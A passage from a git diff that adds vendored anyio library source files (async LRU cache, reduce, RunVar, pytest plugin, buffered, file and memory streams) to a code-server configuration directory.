cache_clear(self) -> None: + self.__wrapper.cache_clear() + + async def __call__(self, *args: Any, **kwargs: Any) -> T: + if self.__instance is None: + return await self.__wrapper(*args, **kwargs) + + return await self.__wrapper(self.__instance, *args, **kwargs) + + +@final +class AsyncLRUCacheWrapper(Generic[P, T]): + def __init__( + self, + func: Callable[P, Awaitable[T]], + maxsize: int | None, + typed: bool, + always_checkpoint: bool, + ): + self.__wrapped__ = func + self._hits: int = 0 + self._misses: int = 0 + self._maxsize = max(maxsize, 0) if maxsize is not None else None + self._currsize: int = 0 + self._typed = typed + self._always_checkpoint = always_checkpoint + update_wrapper(self, func) + + def cache_info(self) -> AsyncCacheInfo: + return AsyncCacheInfo(self._hits, self._misses, self._maxsize, self._currsize) + + def cache_parameters(self) -> AsyncCacheParameters: + return { + "maxsize": self._maxsize, + "typed": self._typed, + "always_checkpoint": self._always_checkpoint, + } + + def cache_clear(self) -> None: + if cache := lru_cache_items.get(None): + cache.pop(self, None) + self._hits = self._misses = self._currsize = 0 + + async def __call__(self, *args: P.args, **kwargs: P.kwargs) -> T: + # Easy case first: if maxsize == 0, no caching is done + if self._maxsize == 0: + value = await self.__wrapped__(*args, **kwargs) + self._misses += 1 + return value + + # The key is constructed as a flat tuple to avoid memory overhead + key: tuple[Any, ...] = args + if kwargs: + # initial_missing is used as a separator + key += (initial_missing,) + sum(kwargs.items(), ()) + + if self._typed: + key += tuple(type(arg) for arg in args) + if kwargs: + key += (initial_missing,) + tuple(type(val) for val in kwargs.values()) + + try: + cache = lru_cache_items.get() + except LookupError: + cache = WeakKeyDictionary() + lru_cache_items.set(cache) + + try: + cache_entry = cache[self] + except KeyError: + cache_entry = cache[self] = OrderedDict() + + cached_value: T | _InitialMissingType + try: + cached_value, lock = cache_entry[key] + except KeyError: + # We're the first task to call this function + cached_value, lock = ( + initial_missing, + Lock(fast_acquire=not self._always_checkpoint), + ) + cache_entry[key] = cached_value, lock + + if lock is None: + # The value was already cached + self._hits += 1 + cache_entry.move_to_end(key) + if self._always_checkpoint: + await checkpoint() + + return cast(T, cached_value) + + async with lock: + # Check if another task filled the cache while we acquired the lock + if (cached_value := cache_entry[key][0]) is initial_missing: + self._misses += 1 + if self._maxsize is not None and self._currsize >= self._maxsize: + cache_entry.popitem(last=False) + else: + self._currsize += 1 + + value = await self.__wrapped__(*args, **kwargs) + cache_entry[key] = value, None + else: + # Another task filled the cache while we were waiting for the lock + self._hits += 1 + cache_entry.move_to_end(key) + value = cast(T, cached_value) + + return value + + def __get__( + self, instance: object, owner: type | None = None + ) -> _LRUMethodWrapper[T]: + wrapper = _LRUMethodWrapper(self, instance) + update_wrapper(wrapper, self.__wrapped__) + return wrapper + + +class _LRUCacheWrapper(Generic[T]): + def __init__(self, maxsize: int | None, typed: bool, always_checkpoint: bool): + self._maxsize = maxsize + self._typed = typed + self._always_checkpoint = always_checkpoint + + @overload + def __call__( # type: ignore[overload-overlap] + self, func: Callable[P, Coroutine[Any, Any, T]], / + ) -> AsyncLRUCacheWrapper[P, T]: ... + + @overload + def __call__( + self, func: Callable[..., T], / + ) -> functools._lru_cache_wrapper[T]: ... + + def __call__( + self, f: Callable[P, Coroutine[Any, Any, T]] | Callable[..., T], / + ) -> AsyncLRUCacheWrapper[P, T] | functools._lru_cache_wrapper[T]: + if iscoroutinefunction(f): + return AsyncLRUCacheWrapper( + f, self._maxsize, self._typed, self._always_checkpoint + ) + + return functools.lru_cache(maxsize=self._maxsize, typed=self._typed)(f) # type: ignore[arg-type] + + +@overload +def cache( # type: ignore[overload-overlap] + func: Callable[P, Coroutine[Any, Any, T]], / +) -> AsyncLRUCacheWrapper[P, T]: ... + + +@overload +def cache(func: Callable[..., T], /) -> functools._lru_cache_wrapper[T]: ... + + +def cache( + func: Callable[..., T] | Callable[P, Coroutine[Any, Any, T]], / +) -> AsyncLRUCacheWrapper[P, T] | functools._lru_cache_wrapper[T]: + """ + A convenient shortcut for :func:`lru_cache` with ``maxsize=None``. + + This is the asynchronous equivalent to :func:`functools.cache`. + + """ + return lru_cache(maxsize=None)(func) + + +@overload +def lru_cache( + *, maxsize: int | None = ..., typed: bool = ..., always_checkpoint: bool = ... +) -> _LRUCacheWrapper[Any]: ... + + +@overload +def lru_cache( # type: ignore[overload-overlap] + func: Callable[P, Coroutine[Any, Any, T]], / +) -> AsyncLRUCacheWrapper[P, T]: ... + + +@overload +def lru_cache(func: Callable[..., T], /) -> functools._lru_cache_wrapper[T]: ... + + +def lru_cache( + func: Callable[P, Coroutine[Any, Any, T]] | Callable[..., T] | None = None, + /, + *, + maxsize: int | None = 128, + typed: bool = False, + always_checkpoint: bool = False, +) -> ( + AsyncLRUCacheWrapper[P, T] | functools._lru_cache_wrapper[T] | _LRUCacheWrapper[Any] +): + """ + An asynchronous version of :func:`functools.lru_cache`. + + If a synchronous function is passed, the standard library + :func:`functools.lru_cache` is applied instead. + + :param always_checkpoint: if ``True``, every call to the cached function will be + guaranteed to yield control to the event loop at least once + + .. note:: Caches and locks are managed on a per-event loop basis. + + """ + if func is None: + return _LRUCacheWrapper[Any](maxsize, typed, always_checkpoint) + + if not callable(func): + raise TypeError("the first argument must be callable") + + return _LRUCacheWrapper[T](maxsize, typed, always_checkpoint)(func) + + +@overload +async def reduce( + function: Callable[[T, S], Awaitable[T]], + iterable: Iterable[S] | AsyncIterable[S], + /, + initial: T, +) -> T: ... + + +@overload +async def reduce( + function: Callable[[T, T], Awaitable[T]], + iterable: Iterable[T] | AsyncIterable[T], + /, +) -> T: ... + + +async def reduce( # type: ignore[misc] + function: Callable[[T, T], Awaitable[T]] | Callable[[T, S], Awaitable[T]], + iterable: Iterable[T] | Iterable[S] | AsyncIterable[T] | AsyncIterable[S], + /, + initial: T | _InitialMissingType = initial_missing, +) -> T: + """ + Asynchronous version of :func:`functools.reduce`. + + :param function: a coroutine function that takes two arguments: the accumulated + value and the next element from the iterable + :param iterable: an iterable or async iterable + :param initial: the initial value (if missing, the first element of the iterable is + used as the initial value) + + """ + element: Any + function_called = False + if isinstance(iterable, AsyncIterable): + async_it = iterable.__aiter__() + if initial is initial_missing: + try: + value = cast(T, await async_it.__anext__()) + except StopAsyncIteration: + raise TypeError( + "reduce() of empty sequence with no initial value" + ) from None + else: + value = cast(T, initial) + + async for element in async_it: + value = await function(value, element) + function_called = True + elif isinstance(iterable, Iterable): + it = iter(iterable) + if initial is initial_missing: + try: + value = cast(T, next(it)) + except StopIteration: + raise TypeError( + "reduce() of empty sequence with no initial value" + ) from None + else: + value = cast(T, initial) + + for element in it: + value = await function(value, element) + function_called = True + else: + raise TypeError("reduce() argument 2 must be an iterable or async iterable") + + # Make sure there is at least one checkpoint, even if an empty iterable and an + # initial value were given + if not function_called: + await checkpoint() + + return value diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/lowlevel.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/lowlevel.py new file mode 100755 index 0000000..ffbb75a --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/lowlevel.py @@ -0,0 +1,196 @@ +from __future__ import annotations + +__all__ = ( + "EventLoopToken", + "RunvarToken", + "RunVar", + "checkpoint", + "checkpoint_if_cancelled", + "cancel_shielded_checkpoint", + "current_token", +) + +import enum +from dataclasses import dataclass +from types import TracebackType +from typing import Any, Generic, Literal, TypeVar, final, overload +from weakref import WeakKeyDictionary + +from ._core._eventloop import get_async_backend +from .abc import AsyncBackend + +T = TypeVar("T") +D = TypeVar("D") + + +async def checkpoint() -> None: + """ + Check for cancellation and allow the scheduler to switch to another task. + + Equivalent to (but more efficient than):: + + await checkpoint_if_cancelled() + await cancel_shielded_checkpoint() + + .. versionadded:: 3.0 + + """ + await get_async_backend().checkpoint() + + +async def checkpoint_if_cancelled() -> None: + """ + Enter a checkpoint if the enclosing cancel scope has been cancelled. + + This does not allow the scheduler to switch to a different task. + + .. versionadded:: 3.0 + + """ + await get_async_backend().checkpoint_if_cancelled() + + +async def cancel_shielded_checkpoint() -> None: + """ + Allow the scheduler to switch to another task but without checking for cancellation. + + Equivalent to (but potentially more efficient than):: + + with CancelScope(shield=True): + await checkpoint() + + .. versionadded:: 3.0 + + """ + await get_async_backend().cancel_shielded_checkpoint() + + +@final +@dataclass(frozen=True, repr=False) +class EventLoopToken: + """ + An opaque object that holds a reference to an event loop. + + .. versionadded:: 4.11.0 + """ + + backend_class: type[AsyncBackend] + native_token: object + + +def current_token() -> EventLoopToken: + """ + Return a token object that can be used to call code in the current event loop from + another thread. + + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + .. versionadded:: 4.11.0 + + """ + backend_class = get_async_backend() + raw_token = backend_class.current_token() + return EventLoopToken(backend_class, raw_token) + + +_run_vars: WeakKeyDictionary[object, dict[RunVar[Any], Any]] = WeakKeyDictionary() + + +class _NoValueSet(enum.Enum): + NO_VALUE_SET = enum.auto() + + +class RunvarToken(Generic[T]): + __slots__ = "_var", "_value", "_redeemed" + + def __init__(self, var: RunVar[T], value: T | Literal[_NoValueSet.NO_VALUE_SET]): + self._var = var + self._value: T | Literal[_NoValueSet.NO_VALUE_SET] = value + self._redeemed = False + + def __enter__(self) -> RunvarToken[T]: + return self + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self._var.reset(self) + + +class RunVar(Generic[T]): + """ + Like a :class:`~contextvars.ContextVar`, except scoped to the running event loop. + + Can be used as a context manager, Just like :class:`~contextvars.ContextVar`, that + will reset the variable to its previous value when the context block is exited. + """ + + __slots__ = "_name", "_default" + + NO_VALUE_SET: Literal[_NoValueSet.NO_VALUE_SET] = _NoValueSet.NO_VALUE_SET + + def __init__( + self, name: str, default: T | Literal[_NoValueSet.NO_VALUE_SET] = NO_VALUE_SET + ): + self._name = name + self._default = default + + @property + def _current_vars(self) -> dict[RunVar[T], T]: + native_token = current_token().native_token + try: + return _run_vars[native_token] + except KeyError: + run_vars = _run_vars[native_token] = {} + return run_vars + + @overload + def get(self, default: D) -> T | D: ... + + @overload + def get(self) -> T: ... + + def get( + self, default: D | Literal[_NoValueSet.NO_VALUE_SET] = NO_VALUE_SET + ) -> T | D: + try: + return self._current_vars[self] + except KeyError: + if default is not RunVar.NO_VALUE_SET: + return default + elif self._default is not RunVar.NO_VALUE_SET: + return self._default + + raise LookupError( + f'Run variable "{self._name}" has no value and no default set' + ) + + def set(self, value: T) -> RunvarToken[T]: + current_vars = self._current_vars + token = RunvarToken(self, current_vars.get(self, RunVar.NO_VALUE_SET)) + current_vars[self] = value + return token + + def reset(self, token: RunvarToken[T]) -> None: + if token._var is not self: + raise ValueError("This token does not belong to this RunVar") + + if token._redeemed: + raise ValueError("This token has already been used") + + if token._value is _NoValueSet.NO_VALUE_SET: + try: + del self._current_vars[self] + except KeyError: + pass + else: + self._current_vars[self] = token._value + + token._redeemed = True + + def __repr__(self) -> str: + return f"" diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/py.typed b/code-server-config/.local/lib/python3.12/site-packages/anyio/py.typed new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/pytest_plugin.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/pytest_plugin.py new file mode 100755 index 0000000..4222816 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/pytest_plugin.py @@ -0,0 +1,302 @@ +from __future__ import annotations + +import socket +import sys +from collections.abc import Callable, Generator, Iterator +from contextlib import ExitStack, contextmanager +from inspect import isasyncgenfunction, iscoroutinefunction, ismethod +from typing import Any, cast + +import pytest +from _pytest.fixtures import SubRequest +from _pytest.outcomes import Exit + +from . import get_available_backends +from ._core._eventloop import ( + current_async_library, + get_async_backend, + reset_current_async_library, + set_current_async_library, +) +from ._core._exceptions import iterate_exceptions +from .abc import TestRunner + +if sys.version_info < (3, 11): + from exceptiongroup import ExceptionGroup + +_current_runner: TestRunner | None = None +_runner_stack: ExitStack | None = None +_runner_leases = 0 + + +def extract_backend_and_options(backend: object) -> tuple[str, dict[str, Any]]: + if isinstance(backend, str): + return backend, {} + elif isinstance(backend, tuple) and len(backend) == 2: + if isinstance(backend[0], str) and isinstance(backend[1], dict): + return cast(tuple[str, dict[str, Any]], backend) + + raise TypeError("anyio_backend must be either a string or tuple of (string, dict)") + + +@contextmanager +def get_runner( + backend_name: str, backend_options: dict[str, Any] +) -> Iterator[TestRunner]: + global _current_runner, _runner_leases, _runner_stack + if _current_runner is None: + asynclib = get_async_backend(backend_name) + _runner_stack = ExitStack() + if current_async_library() is None: + # Since we're in control of the event loop, we can cache the name of the + # async library + token = set_current_async_library(backend_name) + _runner_stack.callback(reset_current_async_library, token) + + backend_options = backend_options or {} + _current_runner = _runner_stack.enter_context( + asynclib.create_test_runner(backend_options) + ) + + _runner_leases += 1 + try: + yield _current_runner + finally: + _runner_leases -= 1 + if not _runner_leases: + assert _runner_stack is not None + _runner_stack.close() + _runner_stack = _current_runner = None + + +def pytest_addoption(parser: pytest.Parser) -> None: + parser.addini( + "anyio_mode", + default="strict", + help='AnyIO plugin mode (either "strict" or "auto")', + ) + + +def pytest_configure(config: pytest.Config) -> None: + config.addinivalue_line( + "markers", + "anyio: mark the (coroutine function) test to be run asynchronously via anyio.", + ) + if ( + config.getini("anyio_mode") == "auto" + and config.pluginmanager.has_plugin("asyncio") + and config.getini("asyncio_mode") == "auto" + ): + config.issue_config_time_warning( + pytest.PytestConfigWarning( + "AnyIO auto mode has been enabled together with pytest-asyncio auto " + "mode. This may cause unexpected behavior." + ), + 1, + ) + + +@pytest.hookimpl(hookwrapper=True) +def pytest_fixture_setup(fixturedef: Any, request: Any) -> Generator[Any]: + def wrapper(anyio_backend: Any, request: SubRequest, **kwargs: Any) -> Any: + # Rebind any fixture methods to the request instance + if ( + request.instance + and ismethod(func) + and type(func.__self__) is type(request.instance) + ): + local_func = func.__func__.__get__(request.instance) + else: + local_func = func + + backend_name, backend_options = extract_backend_and_options(anyio_backend) + if has_backend_arg: + kwargs["anyio_backend"] = anyio_backend + + if has_request_arg: + kwargs["request"] = request + + with get_runner(backend_name, backend_options) as runner: + if isasyncgenfunction(local_func): + yield from runner.run_asyncgen_fixture(local_func, kwargs) + else: + yield runner.run_fixture(local_func, kwargs) + + # Only apply this to coroutine functions and async generator functions in requests + # that involve the anyio_backend fixture + func = fixturedef.func + if isasyncgenfunction(func) or iscoroutinefunction(func): + if "anyio_backend" in request.fixturenames: + fixturedef.func = wrapper + original_argname = fixturedef.argnames + + if not (has_backend_arg := "anyio_backend" in fixturedef.argnames): + fixturedef.argnames += ("anyio_backend",) + + if not (has_request_arg := "request" in fixturedef.argnames): + fixturedef.argnames += ("request",) + + try: + return (yield) + finally: + fixturedef.func = func + fixturedef.argnames = original_argname + + return (yield) + + +@pytest.hookimpl(tryfirst=True) +def pytest_pycollect_makeitem( + collector: pytest.Module | pytest.Class, name: str, obj: object +) -> None: + if collector.istestfunction(obj, name): + inner_func = obj.hypothesis.inner_test if hasattr(obj, "hypothesis") else obj + if iscoroutinefunction(inner_func): + anyio_auto_mode = collector.config.getini("anyio_mode") == "auto" + marker = collector.get_closest_marker("anyio") + own_markers = getattr(obj, "pytestmark", ()) + if ( + anyio_auto_mode + or marker + or any(marker.name == "anyio" for marker in own_markers) + ): + pytest.mark.usefixtures("anyio_backend")(obj) + + +@pytest.hookimpl(tryfirst=True) +def pytest_pyfunc_call(pyfuncitem: Any) -> bool | None: + def run_with_hypothesis(**kwargs: Any) -> None: + with get_runner(backend_name, backend_options) as runner: + runner.run_test(original_func, kwargs) + + backend = pyfuncitem.funcargs.get("anyio_backend") + if backend: + backend_name, backend_options = extract_backend_and_options(backend) + + if hasattr(pyfuncitem.obj, "hypothesis"): + # Wrap the inner test function unless it's already wrapped + original_func = pyfuncitem.obj.hypothesis.inner_test + if original_func.__qualname__ != run_with_hypothesis.__qualname__: + if iscoroutinefunction(original_func): + pyfuncitem.obj.hypothesis.inner_test = run_with_hypothesis + + return None + + if iscoroutinefunction(pyfuncitem.obj): + funcargs = pyfuncitem.funcargs + testargs = {arg: funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames} + with get_runner(backend_name, backend_options) as runner: + try: + runner.run_test(pyfuncitem.obj, testargs) + except ExceptionGroup as excgrp: + for exc in iterate_exceptions(excgrp): + if isinstance(exc, (Exit, KeyboardInterrupt, SystemExit)): + raise exc from excgrp + + raise + + return True + + return None + + +@pytest.fixture(scope="module", params=get_available_backends()) +def anyio_backend(request: Any) -> Any: + return request.param + + +@pytest.fixture +def anyio_backend_name(anyio_backend: Any) -> str: + if isinstance(anyio_backend, str): + return anyio_backend + else: + return anyio_backend[0] + + +@pytest.fixture +def anyio_backend_options(anyio_backend: Any) -> dict[str, Any]: + if isinstance(anyio_backend, str): + return {} + else: + return anyio_backend[1] + + +class FreePortFactory: + """ + Manages port generation based on specified socket kind, ensuring no duplicate + ports are generated. + + This class provides functionality for generating available free ports on the + system. It is initialized with a specific socket kind and can generate ports + for given address families while avoiding reuse of previously generated ports. + + Users should not instantiate this class directly, but use the + ``free_tcp_port_factory`` and ``free_udp_port_factory`` fixtures instead. For simple + uses cases, ``free_tcp_port`` and ``free_udp_port`` can be used instead. + """ + + def __init__(self, kind: socket.SocketKind) -> None: + self._kind = kind + self._generated = set[int]() + + @property + def kind(self) -> socket.SocketKind: + """ + The type of socket connection (e.g., :data:`~socket.SOCK_STREAM` or + :data:`~socket.SOCK_DGRAM`) used to bind for checking port availability + + """ + return self._kind + + def __call__(self, family: socket.AddressFamily | None = None) -> int: + """ + Return an unbound port for the given address family. + + :param family: if omitted, both IPv4 and IPv6 addresses will be tried + :return: a port number + + """ + if family is not None: + families = [family] + else: + families = [socket.AF_INET] + if socket.has_ipv6: + families.append(socket.AF_INET6) + + while True: + port = 0 + with ExitStack() as stack: + for family in families: + sock = stack.enter_context(socket.socket(family, self._kind)) + addr = "::1" if family == socket.AF_INET6 else "127.0.0.1" + try: + sock.bind((addr, port)) + except OSError: + break + + if not port: + port = sock.getsockname()[1] + else: + if port not in self._generated: + self._generated.add(port) + return port + + +@pytest.fixture(scope="session") +def free_tcp_port_factory() -> FreePortFactory: + return FreePortFactory(socket.SOCK_STREAM) + + +@pytest.fixture(scope="session") +def free_udp_port_factory() -> FreePortFactory: + return FreePortFactory(socket.SOCK_DGRAM) + + +@pytest.fixture +def free_tcp_port(free_tcp_port_factory: Callable[[], int]) -> int: + return free_tcp_port_factory() + + +@pytest.fixture +def free_udp_port(free_udp_port_factory: Callable[[], int]) -> int: + return free_udp_port_factory() diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/__init__.py new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/buffered.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/buffered.py new file mode 100755 index 0000000..57c7cd7 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/buffered.py @@ -0,0 +1,188 @@ +from __future__ import annotations + +__all__ = ( + "BufferedByteReceiveStream", + "BufferedByteStream", + "BufferedConnectable", +) + +import sys +from collections.abc import Callable, Iterable, Mapping +from dataclasses import dataclass, field +from typing import Any, SupportsIndex + +from .. import ClosedResourceError, DelimiterNotFound, EndOfStream, IncompleteRead +from ..abc import ( + AnyByteReceiveStream, + AnyByteStream, + AnyByteStreamConnectable, + ByteReceiveStream, + ByteStream, + ByteStreamConnectable, +) + +if sys.version_info >= (3, 12): + from typing import override +else: + from typing_extensions import override + + +@dataclass(eq=False) +class BufferedByteReceiveStream(ByteReceiveStream): + """ + Wraps any bytes-based receive stream and uses a buffer to provide sophisticated + receiving capabilities in the form of a byte stream. + """ + + receive_stream: AnyByteReceiveStream + _buffer: bytearray = field(init=False, default_factory=bytearray) + _closed: bool = field(init=False, default=False) + + async def aclose(self) -> None: + await self.receive_stream.aclose() + self._closed = True + + @property + def buffer(self) -> bytes: + """The bytes currently in the buffer.""" + return bytes(self._buffer) + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + return self.receive_stream.extra_attributes + + def feed_data(self, data: Iterable[SupportsIndex], /) -> None: + """ + Append data directly into the buffer. + + Any data in the buffer will be consumed by receive operations before receiving + anything from the wrapped stream. + + :param data: the data to append to the buffer (can be bytes or anything else + that supports ``__index__()``) + + """ + self._buffer.extend(data) + + async def receive(self, max_bytes: int = 65536) -> bytes: + if self._closed: + raise ClosedResourceError + + if self._buffer: + chunk = bytes(self._buffer[:max_bytes]) + del self._buffer[:max_bytes] + return chunk + elif isinstance(self.receive_stream, ByteReceiveStream): + return await self.receive_stream.receive(max_bytes) + else: + # With a bytes-oriented object stream, we need to handle any surplus bytes + # we get from the receive() call + chunk = await self.receive_stream.receive() + if len(chunk) > max_bytes: + # Save the surplus bytes in the buffer + self._buffer.extend(chunk[max_bytes:]) + return chunk[:max_bytes] + else: + return chunk + + async def receive_exactly(self, nbytes: int) -> bytes: + """ + Read exactly the given amount of bytes from the stream. + + :param nbytes: the number of bytes to read + :return: the bytes read + :raises ~anyio.IncompleteRead: if the stream was closed before the requested + amount of bytes could be read from the stream + + """ + while True: + remaining = nbytes - len(self._buffer) + if remaining <= 0: + retval = self._buffer[:nbytes] + del self._buffer[:nbytes] + return bytes(retval) + + try: + if isinstance(self.receive_stream, ByteReceiveStream): + chunk = await self.receive_stream.receive(remaining) + else: + chunk = await self.receive_stream.receive() + except EndOfStream as exc: + raise IncompleteRead from exc + + self._buffer.extend(chunk) + + async def receive_until(self, delimiter: bytes, max_bytes: int) -> bytes: + """ + Read from the stream until the delimiter is found or max_bytes have been read. + + :param delimiter: the marker to look for in the stream + :param max_bytes: maximum number of bytes that will be read before raising + :exc:`~anyio.DelimiterNotFound` + :return: the bytes read (not including the delimiter) + :raises ~anyio.IncompleteRead: if the stream was closed before the delimiter + was found + :raises ~anyio.DelimiterNotFound: if the delimiter is not found within the + bytes read up to the maximum allowed + + """ + delimiter_size = len(delimiter) + offset = 0 + while True: + # Check if the delimiter can be found in the current buffer + index = self._buffer.find(delimiter, offset) + if index >= 0: + found = self._buffer[:index] + del self._buffer[: index + len(delimiter) :] + return bytes(found) + + # Check if the buffer is already at or over the limit + if len(self._buffer) >= max_bytes: + raise DelimiterNotFound(max_bytes) + + # Read more data into the buffer from the socket + try: + data = await self.receive_stream.receive() + except EndOfStream as exc: + raise IncompleteRead from exc + + # Move the offset forward and add the new data to the buffer + offset = max(len(self._buffer) - delimiter_size + 1, 0) + self._buffer.extend(data) + + +class BufferedByteStream(BufferedByteReceiveStream, ByteStream): + """ + A full-duplex variant of :class:`BufferedByteReceiveStream`. All writes are passed + through to the wrapped stream as-is. + """ + + def __init__(self, stream: AnyByteStream): + """ + :param stream: the stream to be wrapped + + """ + super().__init__(stream) + self._stream = stream + + @override + async def send_eof(self) -> None: + await self._stream.send_eof() + + @override + async def send(self, item: bytes) -> None: + await self._stream.send(item) + + +class BufferedConnectable(ByteStreamConnectable): + def __init__(self, connectable: AnyByteStreamConnectable): + """ + :param connectable: the connectable to wrap + + """ + self.connectable = connectable + + @override + async def connect(self) -> BufferedByteStream: + stream = await self.connectable.connect() + return BufferedByteStream(stream) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/file.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/file.py new file mode 100755 index 0000000..82d2da8 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/file.py @@ -0,0 +1,154 @@ +from __future__ import annotations + +__all__ = ( + "FileReadStream", + "FileStreamAttribute", + "FileWriteStream", +) + +from collections.abc import Callable, Mapping +from io import SEEK_SET, UnsupportedOperation +from os import PathLike +from pathlib import Path +from typing import Any, BinaryIO, cast + +from .. import ( + BrokenResourceError, + ClosedResourceError, + EndOfStream, + TypedAttributeSet, + to_thread, + typed_attribute, +) +from ..abc import ByteReceiveStream, ByteSendStream + + +class FileStreamAttribute(TypedAttributeSet): + #: the open file descriptor + file: BinaryIO = typed_attribute() + #: the path of the file on the file system, if available (file must be a real file) + path: Path = typed_attribute() + #: the file number, if available (file must be a real file or a TTY) + fileno: int = typed_attribute() + + +class _BaseFileStream: + def __init__(self, file: BinaryIO): + self._file = file + + async def aclose(self) -> None: + await to_thread.run_sync(self._file.close) + + @property + def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: + attributes: dict[Any, Callable[[], Any]] = { + FileStreamAttribute.file: lambda: self._file, + } + + if hasattr(self._file, "name"): + attributes[FileStreamAttribute.path] = lambda: Path(self._file.name) + + try: + self._file.fileno() + except UnsupportedOperation: + pass + else: + attributes[FileStreamAttribute.fileno] = lambda: self._file.fileno() + + return attributes + + +class FileReadStream(_BaseFileStream, ByteReceiveStream): + """ + A byte stream that reads from a file in the file system. + + :param file: a file that has been opened for reading in binary mode + + .. versionadded:: 3.0 + """ + + @classmethod + async def from_path(cls, path: str | PathLike[str]) -> FileReadStream: + """ + Create a file read stream by opening the given file. + + :param path: path of the file to read from + + """ + file = await to_thread.run_sync(Path(path).open, "rb") + return cls(cast(BinaryIO, file)) + + async def receive(self, max_bytes: int = 65536) -> bytes: + try: + data = await to_thread.run_sync(self._file.read, max_bytes) + except ValueError: + raise ClosedResourceError from None + except OSError as exc: + raise BrokenResourceError from exc + + if data: + return data + else: + raise EndOfStream + + async def seek(self, position: int, whence: int = SEEK_SET) -> int: + """ + Seek the file to the given position. + + .. seealso:: :meth:`io.IOBase.seek` + + .. note:: Not all file descriptors are seekable. + + :param position: position to seek the file to + :param whence: controls how ``position`` is interpreted + :return: the new absolute position + :raises OSError: if the file is not seekable + + """ + return await to_thread.run_sync(self._file.seek, position, whence) + + async def tell(self) -> int: + """ + Return the current stream position. + + .. note:: Not all file descriptors are seekable. + + :return: the current absolute position + :raises OSError: if the file is not seekable + + """ + return await to_thread.run_sync(self._file.tell) + + +class FileWriteStream(_BaseFileStream, ByteSendStream): + """ + A byte stream that writes to a file in the file system. + + :param file: a file that has been opened for writing in binary mode + + .. versionadded:: 3.0 + """ + + @classmethod + async def from_path( + cls, path: str | PathLike[str], append: bool = False + ) -> FileWriteStream: + """ + Create a file write stream by opening the given file for writing. + + :param path: path of the file to write to + :param append: if ``True``, open the file for appending; if ``False``, any + existing file at the given path will be truncated + + """ + mode = "ab" if append else "wb" + file = await to_thread.run_sync(Path(path).open, mode) + return cls(cast(BinaryIO, file)) + + async def send(self, item: bytes) -> None: + try: + await to_thread.run_sync(self._file.write, item) + except ValueError: + raise ClosedResourceError from None + except OSError as exc: + raise BrokenResourceError from exc diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/memory.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/memory.py new file mode 100755 index 0000000..a3fa0c3 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/streams/memory.py @@ -0,0 +1,325 @@ +from __future__ import annotations + +__all__ = ( + "MemoryObjectReceiveStream", + "MemoryObjectSendStream", + "MemoryObjectStreamStatistics", +) + +import warnings +from collections import OrderedDict, deque +from dataclasses import dataclass, field +from types import TracebackType +from typing import Generic, NamedTuple, TypeVar + +from .. import ( + BrokenResourceError, + ClosedResourceError, + EndOfStream, + WouldBlock, +) +from .._core._testing import TaskInfo, get_current_task +from ..abc import Event, ObjectReceiveStream, ObjectSendStream +from ..lowlevel import checkpoint + +T_Item = TypeVar("T_Item") +T_co = TypeVar("T_co", covariant=True) +T_contra = TypeVar("T_contra", contravariant=True) + + +class MemoryObjectStreamStatistics(NamedTuple): + current_buffer_used: int #: number of items stored in the buffer + #: maximum number of items that can be stored on this stream (or :data:`math.inf`) + max_buffer_size: float + open_send_streams: int #: number of unclosed clones of the send stream + open_receive_streams: int #: number of unclosed clones of the receive stream + #: number of tasks blocked on :meth:`MemoryObjectSendStream.send` + tasks_waiting_send: int + #: number of tasks blocked on :meth:`MemoryObjectReceiveStream.receive` + tasks_waiting_receive: int + + +@dataclass(eq=False) +class _MemoryObjectItemReceiver(Generic[T_Item]): + task_info: TaskInfo = field(init=False, default_factory=get_current_task) + item: T_Item = field(init=False) + + def __repr__(self) -> str: + # When item is not defined, we get following error with default __repr__: + # AttributeError: 'MemoryObjectItemReceiver' object has no attribute 'item' + item = getattr(self, "item", None) + return f"{self.__class__.__name__}(task_info={self.task_info}, item={item!r})" + + +@dataclass(eq=False) +class _MemoryObjectStreamState(Generic[T_Item]): + max_buffer_size: float = field() + buffer: deque[T_Item] = field(init=False, default_factory=deque) + open_send_channels: int = field(init=False, default=0) + open_receive_channels: int = field(init=False, default=0) + waiting_receivers: OrderedDict[Event, _MemoryObjectItemReceiver[T_Item]] = field( + init=False, default_factory=OrderedDict + ) + waiting_senders: OrderedDict[Event, T_Item] = field( + init=False, default_factory=OrderedDict + ) + + def statistics(self) -> MemoryObjectStreamStatistics: + return MemoryObjectStreamStatistics( + len(self.buffer), + self.max_buffer_size, + self.open_send_channels, + self.open_receive_channels, + len(self.waiting_senders), + len(self.waiting_receivers), + ) + + +@dataclass(eq=False) +class MemoryObjectReceiveStream(Generic[T_co], ObjectReceiveStream[T_co]): + _state: _MemoryObjectStreamState[T_co] + _closed: bool = field(init=False, default=False) + + def __post_init__(self) -> None: + self._state.open_receive_channels += 1 + + def receive_nowait(self) -> T_co: + """ + Receive the next item if it can be done without waiting. + + :return: the received item + :raises ~anyio.ClosedResourceError: if this send stream has been closed + :raises ~anyio.EndOfStream: if the buffer is empty and this stream has been + closed from the sending end + :raises ~anyio.WouldBlock: if there are no items in the buffer and no tasks + waiting to send + + """ + if self._closed: + raise ClosedResourceError + + if 